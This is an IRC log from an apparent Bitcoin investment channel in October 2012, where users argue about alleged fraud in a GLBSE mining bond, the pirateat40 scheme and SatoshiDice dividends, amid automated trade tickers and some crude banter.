17:51:38 case Oct 03 17:51:54 HH Oct 03 17:51:55 ahh Oct 03 17:51:55 or gotot the link on the top bar of the main site Oct 03 17:52:10 ViewGraphs i think i called it Oct 03 17:52:12 Isn't there a catch 22 in the proposed motion https://glbse.com/vote/view/156? Oct 03 17:52:14 its there too Oct 03 17:52:22 "If implemented, I would not allow investors to cherry-pick assets from the fund but would instead send them a fair mix of around 5 assets, fairly weighted considering the NAV of NYAN.B and the valuation of the securities which the investors have chosen in motion 155." Oct 03 17:52:45 So NYAN.B would use its very low NAV, while the assets exchanged for will get the fantasy value if chosen in motion 155? Oct 03 17:52:47 yes oneeyed its lol Oct 03 17:53:02 (I should read the thread, that may be in it already) Oct 03 17:53:17 all i see is black MrTiggr, opera and chrome Oct 03 17:53:49 i see the globe Oct 03 17:54:21 cant see shit captain Oct 03 17:54:26 why is the green dot pirateat40??????????? Oct 03 17:54:54 nothing here Oct 03 17:54:55 oh well Oct 03 17:54:56 bbl Oct 03 17:55:18 [GLBSE] [GOATSONABOAT] 2380 @ 0.001 = 2.38 BTC [-] Oct 03 17:55:19 it is like 9MB Oct 03 17:55:21 oh fuck Oct 03 17:55:25 im sory but its slow Oct 03 17:55:32 but in my defense Oct 03 17:55:39 its fully serchable and has cool metrics Oct 03 17:55:45 MrTiggr very cool Oct 03 17:55:52 how can i search it? Oct 03 17:55:54 mooooooooo Oct 03 17:55:55 thx goat Oct 03 17:56:04 saerch at top, Chaang-Noi Oct 03 17:56:05 if i want to find me what do i search? Oct 03 17:56:09 k Oct 03 17:56:31 then full details come up on left panel Oct 03 17:56:36 can navigate from there Oct 03 17:56:43 just search your otc username Oct 03 17:57:13 Smoovious: i have that here on desktop :P Oct 03 17:57:21 just havnet wegl'd it yet Oct 03 17:57:26 'davux' Oct 03 17:57:29 *webGL Oct 03 17:57:34 why does it thin chaang-noi is 'davux' Oct 03 17:57:47 yes just -otc Oct 03 17:57:52 its old data Oct 03 17:57:58 its missing many of recent ratings Oct 03 17:57:58 which is stil 2600 nodes and 14K edges Oct 03 17:58:01 yeah im not on it Oct 03 17:58:09 yes its 5 days old Oct 03 17:58:20 ive been busy on iseecoins.org Oct 03 17:58:21 wtf, refresh Oct 03 17:58:23 why am i not o it? cuz i never used otc? Oct 03 17:58:33 OKOK ill go refresh now Oct 03 17:58:43 takes me about 45 mins to build a new on Oct 03 17:58:57 yes if you arent rated on otc you wont be there, Chaang-Noi Oct 03 17:59:10 ahh Oct 03 17:59:12 im not rated Oct 03 17:59:48 aight ..BRB ... off to build the latest WoT Graph Oct 03 18:00:29 off for sex Oct 03 18:00:35 doubt i will be back tonight Oct 03 18:00:38 peace Oct 03 18:02:45 [GLBSE] [BITBOND] 1 @ 0.21 BTC [-] Oct 03 18:02:47 [GLBSE] [BITBOND] 1 @ 0.2 BTC [-] Oct 03 18:03:04 [GLBSE] [BMF] 2 @ 0.45999999 = 0.92 BTC [+] Oct 03 18:04:43 off for sex << generally those that say that, aren't getting it Oct 03 18:04:53 boosh Oct 03 18:05:00 i got some last night like a boss Oct 03 18:05:11 i feel frisky today too Oct 03 18:05:14 perhaps, but did you leave irc claiming you're about to get some? Oct 03 18:05:29 no i got the order all wrong Oct 03 18:05:37 i had the sex first then claimed to have Oct 03 18:05:40 lol Smoovious Oct 03 18:05:54 I thought goat was married and had a kid? Oct 03 18:06:10 please don't tell me he pulled a jesus Oct 03 18:06:29 is that like a donkey punch? Oct 03 18:06:35 off for sex << generally those that say that, aren't getting it<< Or paying for it ;) Oct 03 18:07:06 sucky sucky ten dollah Oct 03 18:07:43 [GLBSE] [BDK.BND] 1 @ 0.03252001 BTC [-] Oct 03 18:09:00 PsychoticBoy: that's not like he is in a country where paying for sex is easy and well accepted… oh, wait Oct 03 18:09:24 hehe ;) Oct 03 18:10:16 [MPEX] [S.MPOE] 7388 @ 0.00035974 = 2.6578 BTC [-] Oct 03 18:10:52 He had a mining bond named Tygrr-bond.a , and did not have any mining hardware !!! Oct 03 18:10:58 Smoovious: you're thinking about a ponzi over a ponzi? That's a possibility on the table since day 1, and bitcoinmax is also suspected to have done that Oct 03 18:11:21 PsychoticBoy: well, when you invest in a fund indexed on Euros, an Euro fund, then you have no guarantee that your money is kept in Euros, that's just a reference value Oct 03 18:12:24 but still, you cant issue a mining bond when you dont own hardware, its ethical not correct, so FRAUD Oct 03 18:13:37 So be saying this, I agree Goat should get a SCAMMER tag and he should never get the chance to issue shares of his crap on ANY exchange Oct 03 18:14:05 "Mining bond" doesn't mean you'll mine yourself. Or does it? Or can you invest in a mining operation? Directly? Also indirectly? What is acceptable and what is not? How does that make even a tiny difference for the investors? This is a bond, not a share, you don't own the hardware assets in any way Oct 03 18:15:04 Smoovious: so, please, tell me: what would it change *for you* as an investor? Oct 03 18:15:14 everything Oct 03 18:15:18 he sold lies Oct 03 18:15:34 He sold the promised of a return corresponding to a well known value Oct 03 18:15:36 he initially said he hard the hardware to back it up Oct 03 18:15:42 *had Oct 03 18:16:00 PsychoticBoy: doesn't he? I thought he told he was the majority investor or owner of a massive mining operation? Oct 03 18:16:09 lies Oct 03 18:17:00 he owns maybe 1 single and some gpu but my little brother also got that ;) Oct 03 18:17:13 :) Oct 03 18:18:29 thats the whole point ^^ Oct 03 18:18:38 Seriously, I think that investors are to blame here. Especially considering this is Goat, whose morality doesn't appear to be that high :) Oct 03 18:19:02 he really is a goat Oct 03 18:19:06 Nowhere in the contract is what will be done with the money described. What did you think? That he bought hardware, or that he invested into other mining operations? Oct 03 18:19:37 no he smoked it all ;) basepipe heaven Oct 03 18:19:43 The two alternatives are really different, because in one case there are assets (that the bond owners couldn't claim anyway), and in the second case there are none Oct 03 18:20:23 goat major investor in SR, lol, I am just yapping out my ass now Oct 03 18:21:15 I personally got more than 1.5k btc in glbse assets so plz let glbse live Oct 03 18:21:42 :D Oct 03 18:21:56 So, PsychoticBoy and Smoovious: if you invest dollars into a Euro fund, do you expect the dollars to be converted in Euros and be kept as bills? Or do you expect to get dividends based on the fluctuation of the EUR/USD? Oct 03 18:22:06 ^dividends^returns Oct 03 18:22:20 mining and eur/usd are uncomparable Oct 03 18:22:31 div is not the point Oct 03 18:22:59 Smoovious: there are some funds where you invest dollars and get equivalent returns of if you had longed Euros Oct 03 18:23:01 I dont buy shares specially for div, no Oct 03 18:24:01 Smoovious: people could also invest in mining operations instead of going through Goat if you consider doing it directly Oct 03 18:24:25 Was it supposed to be a pass-through or a hardware owner? I still can't understand what investors expected. One or the other or any of them or both. Oct 03 18:24:57 ;;ticker Oct 03 18:24:58 Best bid: 12.714, Best ask: 12.81, Bid-ask spread: 0.09600, Last trade: 12.81, 24 hour volume: 49780, 24 hour low: 12.55, 24 hour high: 12.8999 Oct 03 18:25:05 Smoovious: well, Goat operation is, in some sorts, a declared Ponzi, which can work if the reference dividend (1MH/s mining) falls quick enough Oct 03 18:25:12 smoovious made the whole point clear: now if he had opened up the bond, named it something other than 'mining' related... that it was a personal loan, and that he would repay the bonds, at a rate determined by difficulty and 1 MH, etc etc etc... that would have been straight up... and we could invest or not, honestly... but no Oct 03 18:25:49 (when I say "work", I mean "work for him", because perpetual also means that he has to pay forever if he doesn't buyback) Oct 03 18:26:00 so it was indeed a get rich quick scam Oct 03 18:26:06 Probably Oct 03 18:26:13 With only one benefitor :) Oct 03 18:26:26 bumm...bummm...bummm Oct 03 18:26:28 But even if it had been a real mining operation, it would have been the same for the investors. Oct 03 18:26:44 They would have gained or lost exactly the same amount of money. Oct 03 18:27:26 The fact that you now *know* that he didn't buy hardware should not change anything of the perception you have of the contract and the expected returns, since they are equivalent. Oct 03 18:27:57 I assumed it earlier, I know it for about 3 weeks Oct 03 18:28:30 That was my only point. If he had invested into a mining operation, then the investors would not have lost or gained one satoshi. So I don't see why investors are complaining. Oct 03 18:29:18 Smoovious: sure, I don't know anything about their dispute. Except that I've seen that Nefario did not explain why he did this, and I lost the trust I had in GLBSE at this time, since I don't know if the same kind of dispute could happen with other asset owners or not. Oct 03 18:29:38 So even if Goat is at fault, which may be totally the case, Nefario also is. Oct 03 18:29:48 why Goat thinks he gets banned? Oct 03 18:29:52 Smoovious: but why do you think the risk is heavier? Did he fail to pay? Oct 03 18:30:27 [GLBSE] [MOORE] 1 @ 0.5001 BTC [+] Oct 03 18:30:54 Smoovious: did he not pay and say "sorry guys, I'm broke and I didn't invest your money"? *That* would be a scam, and I would be 100% on your side. But here, now that people know that he doesn't have mining hardware, he cannot even say "My hardware broke, sorry, no returns until I get a replacement" Oct 03 18:31:24 "Smoovious | and come on... I can't be the only one who saw how obvious..." Every one with a half a brain must have understood it but you see, lots of pole have coin in his crap so... Oct 03 18:31:53 So unless he intends to run, I see that more as a guarantee. I would prefer to invest into a guaranteed 1MH/s equivalent rather than some hardware whose returns would be distributed to me capped at 1MH/s equivalent. Oct 03 18:32:06 and saved probably most investors coin Oct 03 18:32:42 Smoovious: I fault him for the way he handled it as well. Oct 03 18:33:09 Smoovious: he acts not only as an exchange but also as a broker. The brokering part cannot be stopped this way, even if the exchange delists (by freezing for example) the asset. Oct 03 18:34:15 And handling the brokering part to Goat this way is wrong: not only Nefario didn't use a secure way of identifying the claims, prevent double claims and so on, but also he forces people to go to Goat, while some of them had maybe invested in Goat assets only because GLBSE acted as a middle man Oct 03 18:35:04 Smoovious: let's agree to disagree here, I just read the contract, I don't see a fraud, but that is my interpretation. People should learn to read contracts too before investing. Oct 03 18:35:18 [MPEX] [F.GIGA.ETF] 4282 @ 0.00045478 = 1.9474 BTC [+] Oct 03 18:35:51 Smoovious: he has *no way* to contact them, does he? Oct 03 18:37:25 Smoovious: not everyone uses bitcointalk Oct 03 18:37:42 what do you guy do withe those GLBSE codes? Do I need to send it to nefario to get my coin back? Oct 03 18:38:06 Smoovious: I used bitcoins before I joined bitcointalk or the bitcoin channels on IRC. I could have used GLBSE without joining them too (this is not the case as I happened to discover about GLBSE on the forum) Oct 03 18:39:45 I don't have any share managed by Goat (nor any share at all at this time), so I can't see the message Oct 03 18:41:33 Smoovious: how are bond holders supposed to contact Goat? By email? Oct 03 18:41:54 (I haven't seen the message on the forum) Oct 03 18:42:05 Ok Oct 03 18:42:21 Thiis is *really* not what a broker should do… Oct 03 18:42:53 Smoovious: it is obviously, as it is the sole owner of the shares attribution Oct 03 18:43:21 It is not compareble with the stock world you know it, its not nasdaq or AEX or some Oct 03 18:43:49 PsychoticBoy: why not in this case? You even see coinbr starting as a broker for the MPEX exchange Oct 03 18:44:35 The only difference I see is that in the real world, the company itself has the needed information to invite shareholders to general assemblies and such Oct 03 18:44:47 Smoovious: right Oct 03 18:44:48 It is not comparable, it is an open market Oct 03 18:45:40 sure we all (early bitcoin adopters) got spoiled Oct 03 18:46:27 thats how it should work on glbse Oct 03 18:46:38 Agreed with both of you Oct 03 18:46:47 I personally got more than 1.5k btc in glbse assets so plz let glbse live << doesn't seem likely at this point. Oct 03 18:46:53 Smoovious: are you saying such a imprecise contract would have been refused? Oct 03 18:47:04 It is mircea :( Oct 03 18:47:04 maybe if someone half-competent took over management. which isn't likely given the sort of money it makes. Oct 03 18:47:11 [GLBSE] [YABMC] 4 @ 0.07859999 = 0.3144 BTC [+] Oct 03 18:47:36 but I am slowly pulling some btc out, even if its at a loss Oct 03 18:48:02 capex is the most corrupt of all the SL exchanges Oct 03 18:48:04 Smoovious: which is close to my previous point: the contract was imprecise, and did not require nor imply (IMO) that mining hardware would be acquired. Now, GLBSE should take its share of blame for allowing such vague contracts. Oct 03 18:48:16 OneEyed do you think i should dig up the logs of where i was asking goat to put up pics of his imaginary righs ? Oct 03 18:48:23 starting march or something like that. Oct 03 18:48:46 mircea_popescu: you belong to those thinking he has to own mining rigs to offer such a contract whose coupons are based on a fixed mining performance? Oct 03 18:49:01 i belong to those who knew he doesn't and pretty much said so 6 months ago Oct 03 18:49:13 thus are unsurprised now, just vaguely amused at forum "investor" idiocy. Oct 03 18:49:51 I know, I also asked goat back in may, but he only said: go ride a bike little boy, so at that point I really lhate goat Oct 03 18:50:06 mircea_popescu: yes, I understand. But even knowing he doesn't own some, as long as the investors get exactly what they paid for, i.e. coupons indexed on PPS 1MH/s, I don't see as a violation of the contract itself. But I won't redo the discussion here :) Oct 03 18:50:33 I really hope the coinbr/MPEX deal will make a better exchange system. Oct 03 18:50:43 OneEyed its not a violation of the contract. it's a contract under false premises. Oct 03 18:50:52 what deal ? Oct 03 18:51:15 Working together, even if you have nothing to do to make it happen, just let it happen :) Oct 03 18:51:39 :) Oct 03 18:51:47 jurov has been working at it for >3 months now i think Oct 03 18:52:01 tho in truth there were maybe 8 or 9 people/teams that at some point started Oct 03 18:52:34 but back to the contract : if i sell you a car when i own no car, even if later i acquire and deliver you a car i can still be charged for fraud. Oct 03 18:52:44 that people in general don't bother is true, but it's still what it is. Oct 03 18:53:29 obviously it's unclear how much of that does or should carry over into btc. Oct 03 18:53:37 i'm working on it part time since mpex launched beta.. and going crazy from it ... Oct 03 18:53:50 mircea_popescu: if I sell you a "temperature bond" whose dividends are indexed on what the average temperature is at 6:00 in Paris every day, would it be a fraud not to invest into hot air? Oct 03 18:54:08 OneEyed depends if you sell me this bond and claim you will invest into hot air or not Oct 03 18:54:21 if you claim that you're selling it on the basis of your vast holdings of hot air then yes it is. Oct 03 18:54:41 mircea_popescu: I would use the same terms as Goat contract, but replace PPS 1MH/s by "average air temperature at 6:00 minus 20 degrees" Oct 03 18:54:55 take a simpler example : if you write a bad check, whether you eventually cover it or not, you still break the law. Oct 03 18:55:09 OneEyed the terms of goat's contract were, at all times relevant, "test". Oct 03 18:55:13 mircea_popescu: if you refer to claims made outside of the contract, I have to agree with you, however, if you stick to the contract, I don't see he defrauded people. Oct 03 18:55:19 ^^ Oct 03 18:55:22 mircea_popescu: is it really the case? Oct 03 18:55:25 yep Oct 03 18:55:25 "test"? Oct 03 18:55:28 exactly so. Oct 03 18:55:31 Shit Oct 03 18:55:37 lol. Oct 03 18:55:37 And people bought bonds??? Oct 03 18:55:39 yes. Oct 03 18:55:43 Oh my… Oct 03 18:55:44 which is why i say, above. Oct 03 18:55:45 (yes, UTF8) Oct 03 18:55:59 forum "investors" and glbse "investing" are jokes, always were Oct 03 18:56:01 Where does the contract I've read from then? Oct 03 18:56:06 people never noticed before mostly cause i wasn't around to point it out. Oct 03 18:56:13 OneEyed recent and unilateral version. Oct 03 18:56:35 mircea_popescu: don't act as if you were *the* messiah announcing what's true and what's not :) Oct 03 18:56:42 actually i fucked that up, i think it was "Test." Oct 03 18:56:46 Eheh Oct 03 18:56:50 OneEyed except i was :D Oct 03 18:57:16 my pr girl called the pirate thing a scam, at a time nobody else was, the list goes on and on. for better or worse, i r messiah. Oct 03 18:57:20 I've read about Jesus bugs today Oct 03 18:57:27 A bug which you have nailed down, but reappears three days later Oct 03 18:57:32 hahaha Oct 03 18:57:35 that'd be lazarus neh ? Oct 03 18:57:46 o no wait, that was the leper, nevermind Oct 03 18:57:50 :) Oct 03 18:58:18 Btw, I see in Usagi thread (NYAN.B closing) that the girl and others were "locally banned". Is that enforced by the moderators, or do you control yourself? Oct 03 19:00:04 "Backlog digested" Oct 03 19:00:07 "Ready to process" Oct 03 19:00:23 (it was funnier in my head read with a robotic voice) Oct 03 19:00:25 OneEyed it's a joke Oct 03 19:00:26 [MPEX] [F.GIGA.ETF] 252 @ 0.00045478 = 0.1146 BTC [+] Oct 03 19:02:43 mircea_popescu: I hadn't read the whole thread, I just read your new local rules indeed :) Oct 03 19:02:54 hm ? Oct 03 19:03:17 One thing I don't understand about usagi desire to close CPA: why doesn't he hand it over to someone else if he doesnt' want to manage it anymore? Oct 03 19:03:49 whom ? Oct 03 19:04:46 I don't know, but he would probably know people trusting him to get a healthy asset and that he trusts to hand it over Oct 03 19:05:33 Or does that mean that he doesn't know competent people, or that those people wouldn't touch CPA with a 10 foot pole? Oct 03 19:06:29 it means there are very few competent people, and nobody is interested in a. taking over a blown asset ; b. doing anything on glbse Oct 03 19:06:30 etc Oct 03 19:07:37 Smoovious: why would such a guy take a BTC loan with all the risks if brings? Oct 03 19:09:19 Smoovious: why not invest in $? Or do you want to bring in people with € as well, through BTC? Oct 03 19:09:34 Oh, bond, no shares? Oct 03 19:10:48 o hey, we're over 3mn diff Oct 03 19:13:55 [GLBSE] [007] 1 @ 0.09000001 BTC [-] Oct 03 19:13:57 [GLBSE] [007] 1 @ 0.09 BTC [-] Oct 03 19:15:48 [GLBSE] [MU] 1 @ 0.18999999 BTC [-] Oct 03 19:16:25 Is that new that LinkedIn is trying to be the new Twitter? Oct 03 19:16:37 "Now you can follow thought leaders on LinkedIn - Barack Obama - Follow Barack" Oct 03 19:17:00 mircea_popescu: Your -pr girl wasn't the only one calling pirate a scam. There were lots of other people. On the other hand, there's still no hard evidence that anyone has seen that it is. Not yet. The only thing going for the notion is time, but there are alternative explanations. Oct 03 19:17:32 Yeah, so? Oct 03 19:17:42 A fictional movie-jail. Oct 03 19:17:45 midnightmagic: according to your reasoning, we may never be able to call it a scam, if he continues to pretend he will pay later for centuries. Right? Oct 03 19:17:57 OneEyed: Wrong. Oct 03 19:18:39 midnightmagic: note the "may", as we may discover it is a scam by proving it is a scam if, for example, accounting books are found Oct 03 19:19:14 midnightmagic: what I'm saying is that in the absence of proof that it is a scam and in the absence of proof that it isn't, given the current situation, it is most likely a scam Oct 03 19:19:38 OneEyed: You said "centuries". Oct 03 19:19:42 (it may not be a scam, but pirateat40 has not offered any evidence [not even soft evidence] that the bitcoins were invested in anything real) Oct 03 19:19:48 midnightmagic earlier than march ? Oct 03 19:20:07 OneEyed: And no, given the balance of probabilities, "most likely" is too strong, even now. Oct 03 19:20:15 eh come on. Oct 03 19:20:25 mircea_popescu: The instant rumours arrived, yes. Oct 03 19:20:32 midnightmagic: you are delusional :) Oct 03 19:20:45 midnightmagic pls to link me or something Oct 03 19:21:03 OneEyed: Don't get me wrong. The balance is on the scam side. Oct 03 19:21:24 midnightmagic: you have probably seen many signals that indicate that it may be a scam (people not getting money for the main one, without any explanation). Have you seen any signal that may indicate it is not a scam? Oct 03 19:21:25 mircea_popescu: It was on IRC. Oct 03 19:22:14 midnightmagic: judging if an investment is a scam is not the same thing as judging people, there is no "innocent until proven guilty", this is much more balanced. And right now, the balance clearly goes to the scam side, and by an enormous lot Oct 03 19:22:19 OneEyed: Yes. The explanations he's given, so far, do not suggest scam. Only the actions themselves suggest an alternate explanation--that being scam. Oct 03 19:22:56 [GLBSE] [FDBF] 6 @ 0.149 = 0.894 BTC [-] Oct 03 19:23:01 midnightmagic: the explanations were not backed by any fact, right? Any. Oct 03 19:23:19 OneEyed: Speculation on the actions is just that. Oct 03 19:23:33 There are no actual facts about the movement of money either way. Oct 03 19:23:46 Smoovious: He never said publically when. Oct 03 19:23:58 But yes, he did say he would explain. Oct 03 19:24:17 midnightmagic: so turn it the other way: only vague declarations may suggest an alternate explanation -- that it is not a scam. Oct 03 19:24:19 But why explain when it could taint any legal defence he might be mounting? Oct 03 19:24:51 OneEyed: Yes, that is why I say the balance appears to be on "scam". However, in the absence of facts, it is foolish to draw firmer conclusions. Oct 03 19:24:58 midnightmagic: once again, what makes you believe it can be a non-scam? Only his declarations? You're a trusting guy :) Oct 03 19:25:20 OneEyed: I just told you. I don't believe it's a non-scam. Why do you think this is a binary choice? Oct 03 19:25:38 [MPEX] [S.MPOE] 1341 @ 0.00035974 = 0.4824 BTC [-] Oct 03 19:25:40 [MPEX] [S.MPOE] 17096 @ 0.00035972 = 6.1498 BTC [-] Oct 03 19:25:41 [MPEX] [S.MPOE] 15800 @ 0.00035967 = 5.6828 BTC [-] Oct 03 19:25:42 [MPEX] [S.MPOE] 6581 @ 0.00035967 = 2.367 BTC [-] Oct 03 19:25:43 [MPEX] [S.MPOE] 26782 @ 0.00035964 = 9.6319 BTC [-] Oct 03 19:25:55 midnightmagic: sure, it would be foolish to assume in any way it is not a scam, as not a single fact suggests that it is not one. Not one! Did we find out the accounts supposed to have been repayed for example? Or did we get an amount? Nothing, none, zip. Oct 03 19:26:07 Disclosure: I have zero dollars invested; I "own" zero pirate debt. I have zero to gain from his being, or not being, a scam, except in the circuitous rep-of-bitcoin sense. Oct 03 19:26:54 OneEyed: That is correct, it would be foolish to assume or conclude it is not a scam. Oct 03 19:27:31 Smoovious: a lot of *facts* call for scam. He took the money. He met only selected people in Vegas when he told he would meet anyone willing to, and some people have testified that they asked him to meet. He pretended that Trendon Shavers was a DBA, and that it was the name of a guy who didn't even speak English. Oct 03 19:27:34 OneEyed: If I had concluded it was not a scam, I would have been on the "buying up pirate debt" train a long time ago. Oct 03 19:27:55 OneEyed: You should be more careful about the word "testified". Oct 03 19:28:03 midnightmagic: pretended if you wish Oct 03 19:28:33 Smoovious: sure, as I don't expect water to turn into wine on my table, if it does, well, so much the better Oct 03 19:28:40 OneEyed: I would be interested to know about the "name of a guy who didn't even speak English" part. Where did you read that? Oct 03 19:29:21 midnightmagic: you could find it on the forum, I'm not sure I would be able to find it in a reasonable time, but you should look for yourself, try "Trendon Shavers" "DBA" "English" if the forum software lets you do that Oct 03 19:29:28 Smoovious: In reality, people should have been more cognisant of the risks: you can't "assume it was" as though you are certain. You just have to evaluate the risk and behave accordingly. Oct 03 19:29:45 Smoovious: For example, hedging against it in direct proportion to your personal certainty. Oct 03 19:29:48 Found Oct 03 19:29:58 OneEyed: Thank you, I appreciate that. Oct 03 19:30:07 (I'm trying to get thr gith link) Oct 03 19:30:16 sure. Oct 03 19:30:18 https://bitcointalk.org/index.php?topic=108932.msg1187306#msg1187306 Oct 03 19:30:23 much boliged. Oct 03 19:30:26 er.. obliged. Oct 03 19:31:13 midnightmagic: sure, people can be lying, maybe he didn't write that, you can never be certain if you haven't witnessed it yourself Oct 03 19:31:24 Smoovious: In my case, I chose not to participate at all, as sticking to my Grand Plan was more important to me. Oct 03 19:31:45 That, and the inertia of how difficult I'd made reconstructing my offline wallet. Oct 03 19:32:06 [GLBSE] [MERGEDMINING] 1 @ 0.055 BTC [+] Oct 03 19:37:43 [GLBSE] [MMM] 2 @ 0.6 = 1.2 BTC [-] Oct 03 19:37:45 [GLBSE] [MMM] 3 @ 0.59 = 1.77 BTC [-] Oct 03 19:37:46 [GLBSE] [MMM] 1 @ 0.544 BTC [-] Oct 03 19:41:56 Smoovious: you're realizing that posting this out of context and without any link makes it profundly ininteresting? Not that there is much discussion here. Oct 03 19:42:40 OneEyed: I found pirateat40 saying that in my logs. It was on #btcst, 2012, 08/21, around 14:55:38 pacific time. Oct 03 19:43:27 Smoovious: so don't you know any alcoolic person? Oct 03 19:44:10 Smoovious: this acknowledges it as a disease, that can be cured, but is not easy to. I guess if the impregnated person was at risk of harming students in any way, then other texts and sanctions would apply. Oct 03 19:44:49 Smoovious: sure, as people who get depressed, they can just work this out themselves, no need for help, that's not a disease Oct 03 19:45:49 what the going price for 1 Mh/s now days? Oct 03 19:46:01 I'm not saying that's a reasonable plan, 5 strikes also seem a lot to me. But you should try to put yourself into other people shoes before judging. Do you really think the teacher unions would battle to obtain such a text just for free, out of the blue, without any discussion, just because union teachers get drunk all the time maybe? Oct 03 19:46:11 femtotube: ask Nefario :) Oct 03 19:46:38 OneEyed: lol Oct 03 19:46:59 Smoovious: I've seen drunk people be very good teachers, at least in conferences :) Oct 03 19:47:21 By "drunk" I mean "intoxicated", not "so drunk that they vomit all over the place" Oct 03 19:47:47 (does drinking two glasses of wine make you intoxicated and unable to teach? - depend on the person I guess) Oct 03 19:48:07 Here, it is written "under the influence of intoxicating liquor" Oct 03 19:48:20 Smoovious: didn't mean you wouldn't have done a good job Oct 03 19:49:45 Smoovious: of course, if it endangers yourself or other people, I can get that! Oct 03 19:50:04 What's up with the Satoshi Dice dividend yesterday? Oct 03 19:50:12 I bought some shares thinking it would pay a decent dividend... Oct 03 19:50:21 Smoovious: but would for example a librarian endanger other people by having drunk a little too much, or should he be helped to avoid that it happens again? Oct 03 19:50:28 Looks like the dividend is less than 6% a year! Oct 03 19:50:47 [MPEX] [F.GIGA.ETF] 5200 @ 0.00045478 = 2.3649 BTC [+] Oct 03 19:51:13 Smoovious: yeah, so if you are tired because of the chemo you're taking to fight your cancer, you're fucking with your employer, and he should get rid of you, right? Oct 03 19:51:17 I bought some because mircea_popescu claimed it was the highest paying asset on the GLBSE, but it looks like it is actually the lowest.... Oct 03 19:51:19 Because you're not doing your best Oct 03 19:52:02 You could delay the chemo until your next vacation for example, it's not like you would die tomorrow. Why should it care that you're trying to buy 5 more years of life in 15 years? Oct 03 19:52:30 [GLBSE] [GIGAMINING] 3 @ 0.54140003 = 1.6242 BTC [-] Oct 03 19:52:32 [GLBSE] [GIGAMINING] 1 @ 0.54140002 BTC [-] Oct 03 19:52:33 [GLBSE] [GIGAMINING] 1 @ 0.5414 BTC [-] Oct 03 19:52:33 Smoovious: you wrote "get my best". So I guess you never stay late with friends either, because you could be tired. Oct 03 19:52:33 [GLBSE] [GIGAMINING] 9 @ 0.5414 = 4.8726 BTC [-] Oct 03 19:52:34 [GLBSE] [GIGAMINING] 1 @ 0.5412 BTC [-] Oct 03 19:52:35 [GLBSE] [GIGAMINING] 28 @ 0.541 = 15.148 BTC [-] Oct 03 19:52:37 [GLBSE] [GIGAMINING] 1 @ 0.54 BTC [-] Oct 03 19:52:45 [GLBSE] [GIGAMINING] 2 @ 0.54 = 1.08 BTC [-] Oct 03 19:52:49 ... That's pretty rude. Oct 03 19:52:57 Smoovious: nor eat fat food, they make you think slower because more blood is diverted to the stomach, and less to the brain (true fact) Oct 03 19:53:20 OneEyed: That's not a fact. Fats it turns out may be better for humans, including human brains. Oct 03 19:53:34 midnightmagic: on the long term, yes, not while you're digesting Oct 03 19:53:48 So nobody wants to talk about assets in here? Oct 03 19:53:53 OneEyed: Also not true, as the insulin spike of even complex carbs is very very bad for you. Oct 03 19:54:17 GamblingMan: Didn't you read what the channel founder said? Free-for-all in here.. lol Oct 03 19:54:32 midnightmagic: are you saying that eating fat food compared to a light meal does not divert blood for digestion? Oct 03 19:54:39 Lets free for all talk about Satoshi Dice and how the dividend yesterday sucked ass. Oct 03 19:54:45 [GLBSE] [PUREMINING] 3 @ 0.10169999 = 0.3051 BTC [+] Oct 03 19:54:48 I want to hear someone's opinion on what happened. Oct 03 19:55:00 [GLBSE] [PLATINUM] 3 @ 0.00951003 = 0.0285 BTC [-] Oct 03 19:55:03 Is the site dying, was it misrepresented, did the volume of bets drop significantly? Oct 03 19:55:04 OneEyed: I'm saying fats crush appetites better than carbs do, and that comparison is a good example of a false analogy. Oct 03 19:55:25 Why did the dividend fall to below that of most high yielding assets on the NYSE? Oct 03 19:55:29 SD was and always has been boring Oct 03 19:55:37 as an asset, as a site, and an anything Oct 03 19:55:59 They're flooding the market with shares and cutting the hell out of the dividend. Oct 03 19:56:02 Ok, so eating a big plate of French fries makes you more efficient while you're digesting than eating a salad, right? Can't believe this :) Oct 03 19:56:11 Not sure why I thought it wasn't a scam, being listed on the Mpex Oct 03 19:56:18 GamblingMan: SatoshiDice is a distributed denial of service attack that the creators have convinced users to do to themselves, while stealing their money, and forcing the users themselves to bloat their own blockchain .dat files. They are exploiting a human cognitive bias to do so, and are therefore evil. Oct 03 19:56:28 mpex isn't a scam as far as i know Oct 03 19:56:34 itake offense to the accusation Oct 03 19:56:37 GamblingMan: you have everything you need to compute the expected returns yourself, did you do it? Oct 03 19:56:54 No. I listened to mircea_popescu. :( Oct 03 19:57:05 problem one Oct 03 19:57:06 Turns out that was a horrible financial decision. Oct 03 19:58:14 OneEyed: Another false analogy. (french fries vs. salad.) You never said french fries and salad in your original false statement. Oct 03 19:58:23 Seems like Satoshi Dice got tired of scamming users and decided to go for shareholders. Oct 03 19:58:25 And neither did I. Oct 03 19:58:34 GamblingMan: scamming users? o.O Oct 03 19:58:38 I'm going to go away now. Feel free to get in the last word. Or two. Oct 03 19:58:43 :) Oct 03 19:58:47 [GLBSE] [ASICMINER] 2 @ 0.109 = 0.218 BTC [-] Oct 03 19:58:49 [GLBSE] [ASICMINER] 3 @ 0.109 = 0.327 BTC [-] Oct 03 19:58:49 fuck, luke, another excess flood?! Oct 03 19:59:02 copumpkin: Have you ever made 100 best on SD and seen what the actual vs. claimed return is? Oct 03 19:59:04 GamblingMan: how are they scamming users? Or shareholders? Oct 03 19:59:08 *bets Oct 03 19:59:23 GamblingMan: nope, but isn't it verifiable on the blockchain? they don't provide their own randomness Oct 03 19:59:29 GamblingMan: expectation only works over infinite samples Oct 03 19:59:35 any finite number can deviate arbitrarily far from it Oct 03 19:59:42 copumpkin: they could inject their own transcations at appropriate places Oct 03 19:59:51 Show me 1 independent test that ever gives an above average return with more than 100 bets in the sample. Oct 03 19:59:52 OneEyed: how does that help them? Oct 03 19:59:58 You won't be able too... Oct 03 20:00:01 copumpkin: don't they know the random numbers in advance? Oct 03 20:00:09 OneEyed: no, unless they mine Oct 03 20:00:13 and have a lot of mining power Oct 03 20:00:21 Do your own test. Oct 03 20:00:29 copumpkin: what do you mean? They work from the memory pool, since they work in 0-confirmation mode Oct 03 20:00:29 so you're seriously telling me "I went to a casino and played for days, and I lost money! mommy mommy they're scamming" Oct 03 20:00:44 [GLBSE] [BITBOND] 2 @ 0.18620001 = 0.3724 BTC [-] Oct 03 20:00:48 lol Oct 03 20:00:52 anyway, I have to go to a meeting Oct 03 20:00:55 copumpkin: Only if the casino claimed they repaid 98% and I lost 50% consistently. Oct 03 20:01:50 Satoshi Dice is a terrible site to use, terrible company to invest in, and it is listed on a terrible exchange. Oct 03 20:02:08 GamblingMan: if you send me what is needed to play 100 transactions, I'll do it (one line script) and you'll be able to observe the results Oct 03 20:02:12 [GLBSE] [PUREMINING] 3 @ 0.09604001 = 0.2881 BTC [-] Oct 03 20:02:15 